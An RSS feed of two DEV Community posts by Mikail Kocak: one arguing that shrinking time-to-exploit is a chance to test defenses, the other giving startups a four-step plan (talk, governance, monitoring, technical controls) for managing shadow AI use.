<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Mikail Kocak</title>
    <description>The latest articles on DEV Community by Mikail Kocak (@mikik).</description>
    <link>https://dev.to/mikik</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/mikik"/>
    <language>en</language>
    <item>
      <title>Vulnerabities are being exploited faster than ever: opportunity in disguise</title>
      <dc:creator>Mikail Kocak</dc:creator>
      <pubDate>Tue, 07 Apr 2026 08:31:35 +0000</pubDate>
      <link>https://dev.to/mikik/vulnerabities-are-being-exploited-faster-than-ever-opportunity-in-disguise-ki7</link>
      <guid>https://dev.to/mikik/vulnerabities-are-being-exploited-faster-than-ever-opportunity-in-disguise-ki7</guid>
      <description>&lt;p&gt;The &lt;a href="https://zerodayclock.com/" rel="noopener noreferrer"&gt;Zero Day Clock&lt;/a&gt; is now at 1.0d TTE (Time-to-Exploit), meaning vulnerabilities are getting &lt;strong&gt;exploited within 1 day on average. 50% of vulnerabilities are exploited within 17 hours&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://zerodayclock.com/" rel="noopener noreferrer"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foa1w0ifmf1ffyzfdpom9.png" alt="Chart showing TTE (Time-to-Exploit) going from 2.3 years in 2018 to 1.0 days in 2026" width="800" height="530"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: &lt;a href="https://zerodayclock.com/" rel="noopener noreferrer"&gt;https://zerodayclock.com/&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;That's a crazy time for cybersecurity! On one hand we have TTE approaching zero, and on the other hand we are actively throttling dependency updates in our software due to the increased risk of supply-chain attacks (or as PyPI puts it: &lt;a href="https://blog.pypi.org/posts/2026-04-02-incident-report-litellm-telnyx-supply-chain-attack/#:~:text=drinking%20from%20the%20firehose" rel="noopener noreferrer"&gt;we are no longer drinking from the firehose&lt;/a&gt;)&lt;/p&gt;

&lt;p&gt;So we have three problems:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;We need to patch CVEs faster, and unlike attackers: moving fast is risky. One wrong patch or one wrong live-patching can lead to downtime or can lock out legitimate users. Unlike attackers: we have something to lose, and we have processes that we need to follow.&lt;/li&gt;
&lt;li&gt;We need to slow down updates due to increased risk of supply-chain attacks&lt;/li&gt;
&lt;li&gt;And at the same time, the volume of new CVEs is increasing alarmingly&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is an interesting dilemma. This is something that traditional processes cannot handle efficiently and requires increased automation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1g58btx5v3tuz27o7bir.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1g58btx5v3tuz27o7bir.jpg" alt="Meme showing two buttons being hit at the same time by a man looking happy, one that button that says " width="350" height="530"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Rather than panic, we can treat TTE approaching zero as an opportunity. You need to build solid defenses: zero trust, defense in depth, WAF, API Gateways, and defensive programming should be a must, and not a nice-to-have. Defensive programming is especially powerful. Take Log4Shell: how could you have prevented it from being exploited in &lt;strong&gt;your&lt;/strong&gt; application?&lt;/p&gt;

&lt;p&gt;With these defenses in place, you are on the right side of the TTE curve, the next CVE won't become a disaster and it will be an opportunity: fast exploits are fast feedback. The speed allow you to quickly verify where your defenses are working well, and where they need to be reinforced.&lt;/p&gt;

&lt;p&gt;This is the new reality for defenders. TTE is shrinking, but with the right defenses, it becomes a tool, not just a threat.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fast exploits = opportunity to validate defenses&lt;/strong&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>vulnerabilities</category>
    </item>
    <item>
      <title>Controlling AI Sprawl in a Startup Environment</title>
      <dc:creator>Mikail Kocak</dc:creator>
      <pubDate>Wed, 25 Feb 2026 18:13:07 +0000</pubDate>
      <link>https://dev.to/mikik/controlling-ai-sprawl-in-a-startup-environment-3bdb</link>
      <guid>https://dev.to/mikik/controlling-ai-sprawl-in-a-startup-environment-3bdb</guid>
      <description>&lt;p&gt;You probably felt it: new AI tools are constantly popping up, engineers experiment with running multiple agents concurrently and marketing team is using other tools.&lt;/p&gt;

&lt;p&gt;It can feel overwhelming, it can even feel impossible. Especially in a startup or small business: limited budget and resources. Meanwhile, the AI space is evolving &lt;strong&gt;fast&lt;/strong&gt; while security teams can be left in the dust.&lt;/p&gt;

&lt;p&gt;You might even think:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"If companies 10x or 50x bigger than mine are struggling, how can my startup even have a chance?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;You are not behind, you are not failing, you aren't alone, and company size doesn't matter.&lt;/p&gt;

&lt;p&gt;Worry shows up when we believe we have &lt;strong&gt;no control&lt;/strong&gt; over the outcome. So you should ask yourself: "how do I gain control?". This is an incremental process, you don't need perfection.&lt;/p&gt;

&lt;p&gt;In this article, I'll share what I learned on how to tame what I call AI sprawl, and without burning out you or your team, and importantly: without stopping innovation.&lt;/p&gt;

&lt;p&gt;So let's see how you can surf the AI wave!&lt;/p&gt;

&lt;h2&gt;
  
  
  The Challenges
&lt;/h2&gt;

&lt;p&gt;First of all, let's take a look at the key issues startups and small businesses are facing:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Shadow AI - if you know the term "shadow IT" then this will sound familiar: it's the use of unsanctioned AI tools inside the organization, these are AI providers, chatbots, local models, tools, extensions, skills, MCPs, agents, etc.&lt;/p&gt;

&lt;p&gt;The ecosystem is constantly expanding, new tools appear faster than policies can be written and  that speed can feel intimidating. Speed itself isn't the enemy but rather the lack of visibility.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Shadow Cloud - Shadow AI rarely exists alone, it's connected with unsanctioned Cloud storage (OneDrive, Proton Drive, Google Drive, …), personal Cloud Computing accounts (AWS, GCP, Azure), SaaS platforms (Notion, Grammarly, etc.), personal VPS or Cloud Compute instances.&lt;/p&gt;

&lt;p&gt;This isn't malicious most of the time, but rather about convenience. It creates blind spots, we do not see nor know what is leaving our environments, credentials are stored in unknown systems, security is never reviewed. It's a black box. The issue isn't experimentation but rather the unchecked experimentation.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The visibility problem - when Shadow AI and Shadow Cloud expand unchecked, the organization starts losing situational awareness. You don't know where the data is flowing to, what or who is processing it, what is connected to what.&lt;/p&gt;

&lt;p&gt;All this uncertainty is very dangerous.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The startup culture (this is not a bug!) - startups are full of builders and enthusiastic people: they experiment, they optimize, they automate. Security losing sleep over innovation is a sign of growth and not failure.&lt;br&gt;
And what's most important: security must be an enabler, not a blocker.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;There are so many tools, so much stuff. It's hard to know what to focus on.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Constrained resources, startups have very limited number of people, time, and budget. That's normal, and that's part of the fun in startups.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Agentic systems are junior employees at machine speed, they make decisions, call API, trigger workflows and modify data very quickly. They are junior employees except they move at machine speed.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Now, the question is: what do we actually do? Controlling AI sprawl isn't about building a fortress overnight but rather about gradually regaining control, empowering your employees, and creating safe and flexible guardrails.&lt;/p&gt;

&lt;p&gt;I recommend a four-step approach:&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 1: Talk.
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4wy4d2w8odhh3jbfqxik.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4wy4d2w8odhh3jbfqxik.jpg" alt="'Ancient aliens' meme with the caption saying only one word: " width="534" height="467"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The first step can be summed by one word: &lt;strong&gt;talk&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Your goal objective is not to restrict employees or to slow down innovation but rather to understand &lt;strong&gt;why&lt;/strong&gt; they are using these tools and how you can create a safe environment together. On top, you might be surprised by the ideas and solutions the teams have.&lt;/p&gt;

&lt;p&gt;This is critical for three main reasons:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;  Trust - you are engaging, you are demonstrating that you are an ally. Without trust employees may attempt to bypass the controls you try to implement which defeats the purpose.&lt;/li&gt;
&lt;li&gt;  Insights - you will understand what tools people are using, why they use multiple tools, and what workflows are critical. Make sure to document these insights but remember that AI is evolving quickly thus this needs to be a living document.&lt;/li&gt;
&lt;li&gt;  Champions &amp;amp; Feedback lines - you are indirectly establishing feedback lines, and at the same time you are able to identify potential AI security champions. You need to look for employees who seem passionate about AI safety. These people can become your "Safe AI Use Committee" or your champions that help you build and iterate a robust AI security program.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Some employees can be pretty passionate about AI, you might get surprises!&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 2: Governance
&lt;/h2&gt;

&lt;p&gt;Once you understand the landscape, you can start building policies. Policies are one of the most powerful tools: they are low-cost and flexible.&lt;/p&gt;

&lt;p&gt;Focus on directives rather than implementing technical controls otheriwse it's time consuming, costly, and makes it difficult to experiment. And most importantly: you are reducing risks &lt;strong&gt;quickly&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;To start, &lt;strong&gt;perform a simple risk assessment&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What are the key risks?&lt;/li&gt;
&lt;li&gt;How could they materialize?&lt;/li&gt;
&lt;li&gt;What's the impact?&lt;/li&gt;
&lt;li&gt;What directives can reduce the likelihood and severity?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Engage your AI enthusiasts in this step, they often have insights that will make policies more practical and easier to adopt.&lt;/p&gt;

&lt;p&gt;Finally, &lt;strong&gt;define metrics&lt;/strong&gt; to track the effectiveness of your policies and monitor risk levels over time.&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 3: Keep Monitoring &amp;amp; Iterating
&lt;/h2&gt;

&lt;p&gt;Now, once you have the policies, you need to keep monitoring and keep iterating using the metrics you defined.&lt;/p&gt;

&lt;p&gt;Remember: policies aren’t "set and forget".&lt;/p&gt;

&lt;p&gt;As well, keep your feedback lines open,  regularly check-in with team leads, or employees with influence, and your champions.&lt;/p&gt;

&lt;p&gt;Again: talk is your greatest tool, this builds trust and ensures employees see you as an enabler, not a blocker.&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 4: Technical Controls
&lt;/h2&gt;

&lt;p&gt;Once you have a solid and stable foundation, you can start investing in technical controls. These tools can help enforce your policies at scale and further reduces (or even eliminates) the identified risks.&lt;/p&gt;

&lt;p&gt;For example, startups may consider:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;EDR/XDR - for example Wazuh if you are on a tight budget.&lt;/li&gt;
&lt;li&gt;Purchasing enterprise plans for AI tools such as Claude, they give you a lot of control.&lt;/li&gt;
&lt;li&gt;Use scanning tools for things like MCPs, AI skills, models, etc. - for example companies like Socket and Snyk are creating amazing (and open-source) tools around AI: use them.&lt;/li&gt;
&lt;li&gt;Use custom AI configurations, for example the &lt;code&gt;~/.claude&lt;/code&gt;​ folder allows to manage global settings and you can create custom security hooks, or AI skills focused on security, etc.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;So, remember: it's a leadership moment. If you approach AI with fear, you will burn out. Instead approach with curiosity.&lt;/p&gt;

&lt;p&gt;Your friends are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Talk&lt;/li&gt;
&lt;li&gt;Governance&lt;/li&gt;
&lt;li&gt;Your colleagues and champions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And lastly: size doesn't matter. You don't need to be a tech giant to tame AI.&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
    </item>
  </channel>
</rss>
